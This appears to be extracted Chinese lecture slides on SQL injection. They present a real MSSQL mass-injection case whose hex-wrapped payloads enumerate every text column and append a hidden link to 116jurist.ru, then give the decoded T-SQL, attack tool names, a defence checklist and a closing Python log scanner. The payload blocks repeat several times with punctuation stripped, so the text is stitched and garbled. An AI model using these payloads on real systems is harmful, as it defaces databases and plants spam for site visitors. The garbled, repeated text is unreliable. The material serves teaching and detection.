6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL real-world case - 116jurist.ru automated injection, decoded (4/4)
• Request 1 (clean-up pass: cuts off a previously injected "</title><" tail from every text column longer than 10 characters):
  set ansi_warnings off
  DECLARE @T VARCHAR(255),@C VARCHAR(255)
  DECLARE Table_Cursor CURSOR FOR
    select c.TABLE_NAME,c.COLUMN_NAME
    from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t
    where c.DATA_TYPE in ('nvarchar','varchar','ntext','text')
      and c.CHARACTER_MAXIMUM_LENGTH>10
      and t.table_name=c.table_name and t.table_type='BASE TABLE'
  OPEN Table_Cursor
  FETCH NEXT FROM Table_Cursor INTO @T,@C
  WHILE(@@FETCH_STATUS=0)
  BEGIN
    EXEC('UPDATE ['+@T+'] SET ['+@C+']=SUBSTRING(['+@C+'], 1, CHARINDEX(''</title><'',['+@C+']) - 1) where ['+@C+'] like ''%</title><%'' ')
    FETCH NEXT FROM Table_Cursor INTO @T,@C
  END
  CLOSE Table_Cursor
  DEALLOCATE Table_Cursor
• Request 2 (widens every text column longer than 20 characters to varchar(8000) so the HTML fits):
  set ansi_warnings off
  DECLARE @T VARCHAR(255),@C VARCHAR(255)
  DECLARE Table_Cursor CURSOR FOR
    select c.TABLE_NAME,c.COLUMN_NAME
    from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t
    where c.DATA_TYPE in ('nvarchar','varchar','ntext','text')
      and c.CHARACTER_MAXIMUM_LENGTH>20
      and t.table_name=c.table_name and t.table_type='BASE TABLE'
  OPEN Table_Cursor
  FETCH NEXT FROM Table_Cursor INTO @T,@C
  WHILE(@@FETCH_STATUS=0)
  BEGIN
    EXEC('ALTER TABLE ['+@T+'] ALTER COLUMN ['+@C+'] varchar(8000) NOT NULL')
    FETCH NEXT FROM Table_Cursor INTO @T,@C
  END
  CLOSE Table_Cursor
  DEALLOCATE Table_Cursor
• Request 3 (appends a hidden link block to every text column longer than 80 characters; the link text is cp1251 Russian, "юридические-услуги-москва"):
  set ansi_warnings off
  DECLARE @T VARCHAR(255),@C VARCHAR(255)
  DECLARE Table_Cursor CURSOR FOR
    select c.TABLE_NAME,c.COLUMN_NAME
    from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t
    where c.DATA_TYPE in ('nvarchar','varchar','ntext','text')
      and c.CHARACTER_MAXIMUM_LENGTH>80
      and t.table_name=c.table_name and t.table_type='BASE TABLE'
  OPEN Table_Cursor
  FETCH NEXT FROM Table_Cursor INTO @T,@C
  WHILE(@@FETCH_STATUS=0)
  BEGIN
    EXEC('UPDATE ['+@T+'] SET ['+@C+']=CONVERT(VARCHAR(8000),['+@C+'])+''</title><style>.a4tw{position:absolute;clip:rect(457px,auto,auto,457px);}</style><div class=a4tw><a href=http://116jurist.ru >юридические-услуги-москва</a></div>'' ')
    FETCH NEXT FROM Table_Cursor INTO @T,@C
  END
  CLOSE Table_Cursor
  DEALLOCATE Table_Cursor
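The requests above hide the T-SQL inside cast(0x… as varchar(8000)) so that keyword filters looking at the raw query string see only hex. As an added example (not from the slides or from any attacker tooling), the following Python log scanner unwraps that cast, decodes the bytes as cp1251 like the original link text, and alerts on the markers visible in the decoded payload; the log format, the path /getUser.asp and the shortened sample payload are constructed.

```python
"""Decode hex-wrapped T-SQL in request logs and flag the mass-injection markers.

Added example, not part of the original slides. The log lines are constructed;
the request shape (cast(0x... as varchar(8000)) then exec(@s)) and the marker
strings come from the decoded payloads above.
"""
import re
from urllib.parse import unquote_plus

# Wrapper the observed requests used to smuggle T-SQL past keyword filters.
HEX_CAST_RE = re.compile(r"cast\(0x([0-9a-f]+)\s+as\s+varchar\(\d+\)\)", re.IGNORECASE)

# Strings a defender can alert on; each one appears in the decoded payloads.
MARKERS = (
    "information_schema.columns",
    "@@fetch_status",
    "exec('update [",
    "exec('alter table [",
    "</title><style>",
    "116jurist.ru",
)

def decode_hex_casts(query_string: str) -> list[str]:
    """Return the text hidden in every cast(0x... as varchar(N)) of a query string."""
    out = []
    for m in HEX_CAST_RE.finditer(unquote_plus(query_string)):
        h = m.group(1)
        if len(h) % 2:            # SQL Server reads an odd-length 0x123 as 0x0123
            h = "0" + h
        # The real payload carried cp1251 link text; cp1251 is a superset of
        # ASCII, so the T-SQL around it decodes unchanged.
        out.append(bytes.fromhex(h).decode("cp1251", errors="replace"))
    return out

def scan_line(line: str) -> dict:
    """Parse one constructed log line (<date> <time> <method> <path?query> <status>)."""
    fields = line.split()
    target = fields[3] if len(fields) > 3 else ""
    decoded = decode_hex_casts(target.partition("?")[2])
    text = " ".join(decoded).lower()
    hits = [mk for mk in MARKERS if mk in text]
    return {"decoded": decoded, "markers": hits, "suspicious": bool(hits)}

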